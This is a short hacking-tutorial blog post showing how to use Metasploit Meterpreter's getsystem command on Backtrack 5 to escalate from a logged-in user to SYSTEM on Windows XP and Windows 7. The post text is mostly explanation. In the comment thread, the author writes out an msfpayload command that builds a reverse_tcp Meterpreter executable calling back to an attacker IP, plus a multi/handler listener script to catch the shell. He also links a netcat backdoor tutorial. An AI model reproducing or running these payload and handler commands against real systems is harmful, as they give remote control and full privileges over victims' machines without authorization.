Privilege Escalation in Metasploit Meterpreter (Backtrack 5)
Type : Tips and Trick
Level : Easy
What is privilege escalation?
according to wikipedia Privilege Escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.
Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter. I’ve test and try this tips and trick in my Backtrack 5 and Windows XP SP3 and Windows 7 SP0.
This picture below taken when hackers successfully gain an access using Java Signed Applet Social Engineering Toolkit Code Execution.
When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account? Let’s run the help command in your meterpreter console.
That’s it, with getsystem command we will try to escalate our privilege into local system and controlled everything from there.
Hope you enjoyed 
FYI : I’ve try to run getsystem in Windows 7 SP1 , but it didn’t work(Update : It will work depend on which kind of vulnerability and exploit you use).
Incoming search terms:
- backtrack meterpreter commands
- windows xp sp3 metasploit
- meterpreter tricks
- backtrack 5 privilege escalation
- MeterPreter Backtrack
- backtrack meterpreter
- metasploit getsystem windows 7
- meterpreter privilege escalation
- backtrack 5 hack windows xp
- metasploit windows 7 privilege escalation
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
4 Responsesto “Privilege Escalation in Metasploit Meterpreter (Backtrack 5)”
Trackbacks/Pingbacks
- 10 Steps to Use NetCat as a Backdoor in Windows 7 System | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the ...
Leave a Reply
Links
Get Updates via Networkedblogs
hi ,
I try to use metasploit many time but all time i got error"exploit completed but no session was created" plz help me my os is xp3 and remote system os is also xp3.
my firewall is off and antivirus is also plz help me
Thanks
#hitesh
did you set up the options configuration and payload correctly?or maybe you can paste your configuration here
I cracked win 7 fully patched , fully updated microsoft security essentials and got the system by technique 1
if you do it just by getsystem it wont work , but if you run a meterpreter script it will open a new session and then if you do the getsystem it will work
#Himanshu
this
Thanks for your input; btw I forgot to remove the last line of this tutorial
getsystemwas work depend on which exploit you use.And also if you think meterpreter script will work, which script you use?if you use :
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > Meterpreter.exeand then you execute the Meterpreter.exe on victim(WIndows 7 SP1) and you handle it with this meterpreter script :
root@bt:~# cat meterpreter.rcuse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.184
set ExitOnSession false
exploit -j -z
yes you can do it, because you made the connection not from some vulnerability and you exploited it…
I think it’s the same like you execute netcat or rcat from victim and your BT5 handle the connection. http://www.hacking-tutorial.com/hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/